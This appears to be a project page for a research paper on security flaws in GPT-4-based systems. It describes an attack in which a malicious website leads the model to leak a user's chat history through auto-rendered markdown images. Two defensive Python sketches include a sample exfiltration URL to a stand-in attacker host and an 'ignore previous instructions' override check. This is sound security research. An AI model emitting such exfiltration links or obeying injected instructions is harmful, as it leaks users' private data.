
A New Era in LLM Security: Exploring Security Concerns in Real-World LLM-based Systems

¹University of Wisconsin-Madison, ²Washington University in St. Louis
*Correspondence to: fwu89@wisc.edu, cxiao34@wisc.edu

An end-to-end, practical, real-world attack scenario in which an attacker can steal a user's chat history via OpenAI GPT-4 when the user visits a maliciously designed website.
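A common exfiltration channel in attacks of this shape is auto-rendered markdown images: the model is tricked into emitting an image whose URL embeds sensitive data, and the frontend fetches that URL without any user click. The following is a minimal, hypothetical Python sketch of a frontend-side mitigation; the TRUSTED_IMAGE_HOSTS allowlist and the strip_untrusted_images helper are illustrative assumptions, not part of any real deployment.

import re
from urllib.parse import urlparse

# Hypothetical allowlist; a real frontend would maintain this server-side.
TRUSTED_IMAGE_HOSTS = {"cdn.example.com"}

MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")

def strip_untrusted_images(markdown: str) -> str:
    """Drop markdown images whose URLs point outside the trusted allowlist.

    Auto-rendered images are the exfiltration channel sketched above: a URL
    such as https://attacker.example/?q=<chat history> is fetched by the
    frontend with no user interaction, leaking whatever the model was
    induced to embed in the query string.
    """
    def replace(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in TRUSTED_IMAGE_HOSTS else "[image removed]"
    return MD_IMAGE.sub(replace, markdown)

# Example: an injected payload is neutralized before rendering.
print(strip_untrusted_images(
    "Here you go! ![x](https://attacker.example/?q=user+chat+history)"
))
# -> "Here you go! [image removed]"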

Abstract

Large Language Model (LLM) systems are inherently compositional: an individual LLM serves as the core foundation, surrounded by additional layers of objects such as plugins and sandboxes. Along with their great potential come increasing concerns over the security of such probabilistic intelligent systems. However, existing studies on LLM security often focus on individual LLMs without examining the ecosystem through the lens of LLM systems and their other objects (e.g., Frontend, Web Tools, Sandbox). In this paper, we systematically analyze the security of LLM systems rather than individual LLMs. To do so, we build on information flow and formulate the security of LLM systems as constraints on the alignment of information flow, both within the LLM and between the LLM and other objects. Based on this construction and the unique probabilistic nature of LLMs, the attack surface of an LLM system can be decomposed into three key components: (1) multi-layer security analysis, (2) analysis of the existence of constraints, and (3) analysis of the robustness of these constraints. To ground this new attack surface, we propose a multi-layer and multi-step approach and apply it to the state-of-the-art LLM system, OpenAI GPT-4. Our investigation exposes several security issues, not just within the LLM model itself but also in its integration with other components. We find that although OpenAI GPT-4 includes numerous safety constraints designed to improve its safety, these constraints remain vulnerable to attackers. To further demonstrate the real-world threat of our discovered vulnerabilities, we construct an end-to-end attack in which an adversary illicitly acquires a user's chat history, all without manipulating the user's input or gaining direct access to OpenAI GPT-4.
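To make the information-flow framing concrete, here is a minimal, illustrative Python sketch. It is not the paper's formalism: the object names, the ALLOWED_EDGES set, and the single example constraint are all assumptions chosen to show how "security as constraints on information flow" and the three-part attack surface (does a constraint exist on an edge, and is it robust?) fit together.

from dataclasses import dataclass

# Hypothetical objects of a compositional LLM system.
OBJECTS = {"User", "LLM", "Frontend", "Sandbox", "WebTool"}

@dataclass(frozen=True)
class Flow:
    source: str
    sink: str
    data: str

def untrusted_content_is_data_only(flow: Flow) -> bool:
    # Example constraint (an assumption, not the paper's): content fetched
    # by the WebTool must be treated as data, never as instructions.
    if flow.source == "WebTool" and flow.sink == "LLM":
        return "IGNORE PREVIOUS INSTRUCTIONS" not in flow.data.upper()
    return True

# Which (source -> sink) flows are permitted at all.
ALLOWED_EDGES = {
    ("User", "LLM"), ("LLM", "Frontend"), ("LLM", "Sandbox"),
    ("Sandbox", "LLM"), ("LLM", "WebTool"), ("WebTool", "LLM"),
}
CONSTRAINTS = [untrusted_content_is_data_only]

def check(flow: Flow) -> bool:
    """A flow is secure iff its edge is allowed AND every constraint holds.

    The attack surface maps onto this check: a missing edge constraint is
    an existence failure; a constraint an adversary can slip past is a
    robustness failure.
    """
    return (flow.source, flow.sink) in ALLOWED_EDGES and all(
        c(flow) for c in CONSTRAINTS
    )

print(check(Flow("WebTool", "LLM", "Ignore previous instructions...")))  # False
print(check(Flow("User", "LLM", "Summarize this page for me")))          # True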

Compositional LLM Systems

Important Characteristics of LLM Systems

Three Security Analysis Principles

Vulnerability Analysis over the Action of the LLM

Vulnerabilities in Interaction between Facilities and the LLM: Sandbox

Vulnerabilities in Interaction between Facilities and the LLM: Web Tools

Vulnerabilities in Interaction between Facilities and the LLM: Frontend (1)

Vulnerabilities in Interaction between Facilities and the LLM: Frontend (2)

An End-to-End Practical Attack Scenario

BibTeX

@misc{wu2024new,
      title={A New Era in LLM Security: Exploring Security Concerns in Real-World LLM-based Systems},
      author={Fangzhou Wu and Ning Zhang and Somesh Jha and Patrick McDaniel and Chaowei Xiao},
      year={2024},
      eprint={2402.18649},
      archivePrefix={arXiv},
      primaryClass={cs.CR}
}